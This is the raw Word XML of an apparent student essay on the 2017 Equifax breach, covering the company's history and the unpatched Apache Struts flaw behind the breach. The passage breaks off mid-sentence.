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0793" w14:textId="65B64513" w:rsidR="009012BF" w:rsidRPr="007D02A2" w:rsidRDefault="00725DD1" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48E3A198" wp14:editId="4FBBE0E0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4391025</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2095500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1412240" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21300"/>
                <wp:lineTo x="21270" y="21300"/>
                <wp:lineTo x="21270" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2" name="Picture 2" descr="Image result for Retail Credit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tail Credit company"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="14287" t="10127" r="12697" b="5064"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1412240"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12BF" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax Incorporate is a credit reporting agency</w:t>
      </w:r>
      <w:r w:rsidR="00BB1E04" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that distributes</w:t>
      </w:r>
      <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> information on 800 million individual consumers </w:t>
      </w:r>
      <w:r w:rsidR="00BB1E04" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">along with </w:t>
      </w:r>
      <w:r w:rsidR="004D5F52" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>88 million businesses worldwide. Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The incorporate owns</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> massive amounts of data </w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on consumers and possess the ability to</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> turn over</w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the said data</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to anyone who want</w:t>
      </w:r>
      <w:r w:rsidR="001B2958" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000E1B63" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to know credit of certain individuals.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Originally named Retail Credit Company before its last controversy, Equifax changed its name for a better image and expanded its credit report onto companies in the United States after 1975. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA9A28" w14:textId="1EC34CAE" w:rsidR="009012BF" w:rsidRPr="007D02A2" w:rsidRDefault="00927312" w:rsidP="00E36FC7">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41B4A830" wp14:editId="484BE0F0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>796290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1571625" cy="171450"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="19200"/>
                    <wp:lineTo x="21469" y="19200"/>
                    <wp:lineTo x="2146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571625" cy="171450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7A9AFD41" w14:textId="6F82A75D" w:rsidR="00927312" w:rsidRPr="00E36FC7" w:rsidRDefault="00927312" w:rsidP="00927312">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:noProof/>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1</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r w:rsidRPr="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> Retail Credit Company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4A830" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 4" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:72.55pt;margin-top:62.7pt;width:123.75pt;height:13.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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7A9AFD41" w14:textId="6F82A75D" w:rsidR="00927312" w:rsidRPr="00E36FC7" w:rsidRDefault="00927312" w:rsidP="00927312">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:noProof/>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1</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> Retail Credit Company </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="tight" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00316267" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward to </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>September 7</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2017, Equifax announced a cybercrime identity theft event. </w:t>
      </w:r>
      <w:r w:rsidR="009012BF" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> involved </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n Apache Struts </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability with an</w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT systems administrator using an insecure </w:t>
      </w:r>
      <w:r w:rsidR="00F94351" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">password. </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Struts is an interface for creating web applications written in Java. </w:t>
      </w:r>
      <w:r w:rsidR="00C50AF5" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Though the attack was stated to have begun in mid-May, the breach was not observed until July 29, according to Equifax CEO Richard F. Smith and a </w:t>
      </w:r>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">following </w:t>
      </w:r>
      <w:r w:rsidR="00C50AF5" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>report by Equifax</w:t>
      </w:r>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B50FFE" w14:textId="77777777" w:rsidR="000E4CC2" w:rsidRDefault="0030178C" w:rsidP="00EA4394">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EBE6C02" wp14:editId="55C80CE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>6496050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2038350" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="18000"/>
                    <wp:lineTo x="21398" y="18000"/>
                    <wp:lineTo x="2139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38350" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="017E1664" w14:textId="73FCF07E" w:rsidR="00927312" w:rsidRPr="00E36FC7" w:rsidRDefault="00927312" w:rsidP="00927312">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>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2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r w:rsidR="00E36FC7" w:rsidRPr="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00E36FC7" w:rsidRPr="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>Former</w:t>
                            </w:r>
                            <w:r w:rsidR="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> Equifax CEO Richard </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00E36FC7">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:i w:val="0"/>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>Smith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E6C02" id="Text Box 1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:511.5pt;width:160.5pt;height:9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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="017E1664" w14:textId="73FCF07E" w:rsidR="00927312" w:rsidRPr="00E36FC7" w:rsidRDefault="00927312" w:rsidP="00927312">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Figure </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="000E4CC2">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:noProof/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r w:rsidR="00E36FC7" w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00E36FC7" w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>Former</w:t>
                      </w:r>
                      <w:r w:rsidR="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> Equifax CEO Richard </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00E36FC7">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:i w:val="0"/>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>Smith</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="tight" anchorx="margin" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00927312" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46737949" wp14:editId="1B462248">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4448175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2019300" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21396"/>
                <wp:lineTo x="21396" y="21396"/>
                <wp:lineTo x="21396" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="3" name="Picture 3" descr="Image result for Rick Smith, Chairman and CEO of Equi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ck Smith, Chairman and CEO of Equif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312" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="009012BF" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> known specific cause of the Equifax breach was a failure to install a well-publicized security patch to </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Struts</w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> detailed seven months prior to the breach</w:t>
      </w:r>
      <w:r w:rsidR="00927312" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Specifically, </w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2017-5638 </w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>published</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on March 10</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="007D02A2" w:rsidRPr="007D02A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of 2017 </w:t>
      </w:r>
      <w:r w:rsidR="00E36FC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">details that </w:t>
      </w:r>
